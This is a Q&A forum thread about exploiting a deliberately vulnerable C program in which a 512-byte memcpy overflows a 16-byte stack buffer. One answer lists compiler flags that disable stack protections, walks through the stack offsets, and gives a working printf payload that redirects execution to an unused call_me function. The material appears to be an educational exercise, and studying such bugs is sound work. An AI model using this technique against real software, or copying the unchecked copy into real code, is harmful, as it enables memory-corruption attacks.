Exploit the code calling call_me function + use of shellcode

Question

I need to exploit the following code but not sure how to do it.

1. The idea is to exploit the code trying to call the function which is not used call_me.

2. Second idea is to exploit the code using a shellcode. Can you provide me some ideas, please?

---

#include <stdio.h> void call_me() 
{
printf("You cannot call me, noob!\n"); 
}  

void parse_file(char* filename)
{
char url[16];
char buffer[512];

printf("Abriendo fichero %s ...\n", filename);

FILE *f = fopen(filename, "r");
if(f == NULL){
    printf("Fallo al abrir el fichero :(\n");
    return;
}
printf("Leyendo fichero %s ...\n", filename);

fread(buffer, 1, 256, f);
printf("Fichero leido! Contenido: \n");
//printf(buffer);

printf("\nBuscando URL en el fichero..\n");

char* url_start = strstr(buffer, "http://");
if(url_start == NULL){
    printf("URL no encontrada :(\n");
    return;
}

memcpy(url, url_start, 512);

printf("URL: %s\n", url);

fclose(f);
return; 
}   

int main(int argc, char** argv) 
{
if(argc != 2){
    printf("Uso: %s <fichero>\n", argv[0]);
    return -1;  }

parse_file(argv[1]);
return 0; 
}

Answer 1

So.. there are a couple of issues.

First:

disabling security features. If you compile normally you will run into a couple of issues such as stack cookies, memcpy_chck, ASLR. You can easily disable these by adding to your clang command:

clang yourfile.c -fno-stack-protector -D_FORTIFY_SOURCE=0 -fno-pie -o exec

Now lets say you disabled it and you are ready to go.

Now we need to figure out where is "url" which we are going to overflow. Looking at it from a dissasembler, it reveals to us its location on the stack:

url in the stackframe in the dissasembler

Now how do I know that is the "url"?

Well on the Intel ABI the 'rdi' register is used as the very first parameter for functions.

memcpy(url, url_start, 512);

Here is the same code in disassembly(well the important part at least)

Note that yes we load that value into 'rax' first but then later 'rax' is moved into 'rdi' so its the same thing.

So what does this mean?

Well, you need to sort of know how the stack works if you want to make an exploit for a stack based vuln but anyways. In the function epilogue we restore the stack and pop the base pointer from it(decreasing it by one more(4 or 8 bytes depending on ur machine))

Finally, the ret instruction will jump to the value found at the current stack pointer and tries to jump to it.

Now let's do some quick maths.

The buffer is located 32 bytes above the base pointer soo we need 32 + 8(control the bp) and + 8 to control rip.

Now, since you wanted to do shellcode I will show you the solution without it and let you do some research on how to do it since it should be relatively easy.

DON'T LOOK BEYOND THIS IF YOU WANT TO SOLVE IT YOURSELF!!!

solution:

So now with the knowledge that we need 48 bytes lets quickly craft the exploit.

First, include the 'http://' in the text so that we get past the check.

'http://' is 7 characters out of our 48(which is actually 40 because the last 8 will be our new return address) so 40-7 = 33.

We can do 33 'A' s + the 'http://' and we will need the last final piece, which is the address where we want to jump.

Looking in the dissasembler again and we will find the address of 'call_me' call_me in the binary

Since we are on intel we will need to use the little-endian format which will result:

0x0000000100003bb0 -> \xb0\x3b\x00\x00\x01\x00\x00\x00

Now let's craft the exploit to a file and launch it.

printf "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\x3b\x00\x00\x01\x00\x00\x00" > exploit.txt

opening the file with the program will redirect code execution and will print "You cannot call me, noob!"

Exploit working

So, hopefully you learned something and good luck with the exploit!

Answer 2

With shellcode I have doubts. If the shellcode is longer than buffer everything will be overwritten. Even the return address. How to know which address to jump to?